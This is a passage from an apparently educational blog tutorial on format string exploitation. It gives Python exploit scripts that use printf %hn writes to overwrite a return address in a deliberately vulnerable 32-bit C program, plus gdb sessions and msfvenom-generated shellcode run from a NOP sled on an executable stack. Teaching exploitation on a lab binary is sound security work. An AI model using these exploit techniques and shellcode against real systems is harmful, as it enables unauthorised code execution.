AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x56556244 in vulnerable ()
(gdb) x/a 0xffffd13c
0xffffd13c:	0x56556264 <main+31>
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[Inferior 1 (process 7959) exited normally]
(gdb) 

We failed. No crash and the return address was never touched, why !?!? Does that make sense !?!? The answer is very simple: the program accepts only 8192 bytes as an input but our payload is very large. We are now in dire need of reducing the injected payload without losing its effectiveness but how that can be done? When I introduced the %n feature I told you “that specifier requires an int pointer and writes in that variable how many characters have been processed by the function”, then now we have to trick the printf function to process large data without actually passing this data through stdin. The printf function has a nice feature that allows developers to pad their data with spaces without actually writing it by just specifying the number of required spaces before the specifier as follows %10s. We can abuse this feature in order to reduce our payload size and get the same result without exceeding the limit. Let’s modify our exploit:

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd13c <== target (return address pointer)
# 0x565561cd <== pwnme address

payload  = b""
payload += b"\x3c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x3e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"%" + str( (0x61cd - len(payload)) ).encode() + b"p" # => %25029p
payload += b"%4$hn" # pass the low order address as a parameter to printf
payload += b"%" + str( (0x5655 - len(payload)) ).encode() + b"p" 
payload += b"%5$hn" # pass the high order address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)

Let’s run under gdb and see if this strategy will work or not.

We could successfully overwrite the low order bytes with the expected value, but the high order bytes seem to be not right. The reason is that the second write writes the number of all the characters that were previously processed and were written in the low-order address. Moreover, the high-order value of the address is smaller than its counterpart. There are two solutions to this problem: either rearrange the writing priorities and write the high-order value first and then the low-order value. As for making the function process more letters until the 2 bytes become insufficient, this will make it overflow and the 2 bytes will become zero again, and from here we start counting from the beginning. This method is not difficult, as it can be done mathematically easily, but I think the first method is easier and more effective. Let us modify the exploitation code and re-arrange writing priorities.

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd13c <== target (return address pointer)
# 0x565561cd <== pwnme address

payload  = b""
payload += b"\x3c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x3e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"%" + str( (0x5655 - len(payload)) ).encode() + b"p" 
payload += b"%5$hn" # pass the high order address as a parameter to printf
payload += b"%" + str( (0x61cd - 0x5655 - len(payload)) ).encode() + b"p" 
payload += b"%4$hn" # pass the low order address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)

Our plan worked and we were close to writing the value we wanted, we need to add 0x14 only to the current value.

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd13c <== target (return address pointer)
# 0x565561cd <== pwnme address

payload  = b""
payload += b"\x3c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x3e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"%" + str( (0x5655 - len(payload)) ).encode() + b"p" 
payload += b"%5$hn" # pass the high order address as a parameter to printf
payload += b"%" + str( (0x61cd - 0x5655 - len(payload)) + 0x14 ).encode() + b"p" 
payload += b"%4$hn" # pass the low order address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)

Let’s try it.

BINGO, Finally, we could successfully overwrite the instruction pointer and redirecting the execution flow to call the pwnme function.

Executing arbitrary code

Since we can manipulate and redirect the program’s execution flow, we can also inject our own code and force the program to execute it. Let’s remove the pwnme function from the vulnerable sample:

#include <stdio.h>

void vulnerable()
{
    char cStrFmt[8192];
    fgets( cStrFmt, sizeof(cStrFmt), stdin );
    printf( cStrFmt );
}

void main()
{
    vulnerable();
}

And recompile that code as follows:

┌──(abdallah㉿pc)-[~]
└─$ gcc -m32 -pie -z execstack test.c -o test

┌──(abdallah㉿pc)-[~]
└─$ echo "Hello World!" | ./test
Hello World!

Our plan is to inject our malicious code into the stack and then forge the return address to point to the malicious code address in order to make the CPU execute it. We have learned how to manipulate and overwrite anything in the memory, so I will do that quickly.

┌──(abdallah㉿pc)-[~]
└─$ gdb -nx -q ./test
Reading symbols from ./test...
(No debugging symbols found in ./test)
(gdb) b vulnerable 
Breakpoint 1 at 0x11b1
(gdb) r < exploit.txt
Starting program: /home/abdallah/test < exploit.txt

Breakpoint 1, 0x565561b1 in vulnerable ()
(gdb) p $ebp+4
$1 = (void *) 0xffffd14c
(gdb) p $ebp-8192
$2 = (void *) 0xffffb148

The function’s return address is live at 0xffffd14c. And we will inject our shellcode at 0xffffb148. I don’t care about the accuracy of offsets because I will pad my shellcode by many NOP instructions, all we need to do is make sure that we are still inside the function’s stack frame, that’s why I write the shellcode at $ebp-8192 because the frame size needs to be larger because 8192 is the size of the format buffer within this frame. Let’s prepare our exploit:

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd14c <== target (return address pointer)
# 0xffffb148 <== shellcode address

payload  = b""
payload += b"\x4c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x4e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"%" + str( (0xb148 - len(payload)) + 0x100 ).encode() + b"p" 
payload += b"%4$hn" # pass the low order address as a parameter to printf
payload += b"%" + str( (0xffff - 0xb148 - len(payload)) - 0xec ).encode() + b"p" 
payload += b"%5$hn" # pass the high order address as a parameter to printf
payload += b"\x90" * 0x400 # NOP Instructions
payload += b"\xdb\xdd\xd9\x74\x24\xf4\xb8\x0e\x28\x82\x71\x5f\x31"
payload += b"\xc9\xb1\x0c\x31\x47\x18\x03\x47\x18\x83\xef\xf2\xca"
payload += b"\x77\x1b\x01\x53\xe1\x8e\x73\x0b\x3c\x4c\xf2\x2c\x56"
payload += b"\xbd\x77\xdb\xa7\xa9\x58\x79\xc1\x47\x2f\x9e\x43\x70"
payload += b"\x2c\x61\x64\x80\x5b\x05\x64\xd7\xc8\x4c\x85\x1a\x6e"
payload += b"\x7f\x9d\xcf\x6f\xd8\xec\x90"

with open("exploit.txt", "wb+") as f:
    f.write(payload)

The shellcode I use is generated by msfvenom as follows:

┌──(abdallah㉿pc)-[~]
└─$ msfvenom -a x86 --platform linux -p linux/x86/exec -f python -b "\x00" CMD="id" AppendExit=true
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 72 (iteration=0)
x86/shikata_ga_nai chosen with final size 72
Payload size: 72 bytes
Final size of python file: 365 bytes
buf =  b""
buf += b"\xdb\xdd\xd9\x74\x24\xf4\xb8\x0e\x28\x82\x71\x5f\x31"
buf += b"\xc9\xb1\x0c\x31\x47\x18\x03\x47\x18\x83\xef\xf2\xca"
buf += b"\x77\x1b\x01\x53\xe1\x8e\x73\x0b\x3c\x4c\xf2\x2c\x56"
buf += b"\xbd\x77\xdb\xa7\xa9\x58\x79\xc1\x47\x2f\x9e\x43\x70"
buf += b"\x2c\x61\x64\x80\x5b\x05\x64\xd7\xc8\x4c\x85\x1a\x6e"
buf += b"\x7f\x9d\xcf\x6f\xd8\xec\x90"

The exploit injects the malicious format that hijacks the execution flow at the head of the payload. Then, it sprays the stack with NOP instructions (No Operation) so we can jump on any addresses at that range without being restricted to a specific address. Furthermore, the stack layout may look different between the gdb environment and the real environment for several reasons such as additional env variables. You may notice that the gdb is running the program with the full path which may not be the case in the real scenario. All these considerations need a stable solution.

The exploit overwrites the instruction pointer with 0xffffb148 + 0x100 to ensure that in all cases we are within the correct range. When the program jumps to that address, it will find NOP instructions followed by our malicious code.

Breakpoint 2, 0x565561f9 in vulnerable ()
(gdb) si
0xffffb248 in ?? ()
(gdb) x/20i 0xffffb248
=> 0xffffb248:	nop
   0xffffb249:	nop
   0xffffb24a:	nop
   0xffffb24b:	nop
   0xffffb24c:	nop
   0xffffb24d:	nop
   0xffffb24e:	nop
   0xffffb24f:	nop
   0xffffb250:	nop
   0xffffb251:	nop
   0xffffb252:	nop
   0xffffb253:	nop
   0xffffb254:	nop
   0xffffb255:	nop
   0xffffb256:	nop
   0xffffb257:	nop
   0xffffb258:	nop
   0xffffb259:	nop
   0xffffb25a:	nop
   0xffffb25b:	nop

The CPU will keep executing all those NOPs until find the shellcode, once found it will execute it and the program will be terminated by the shellcode.

Conclusion

At the end of the article, I would like to advise you to practice what you have learned with your own hands and not just read. You must face problems and try to solve them yourself, search and ask those who are more experienced than you. In this way, your level will improve and your skills will increase. Do not forget that practice is the key. If you enjoyed the article, do not forget to share it. Thank you for reading. See you later in a new article.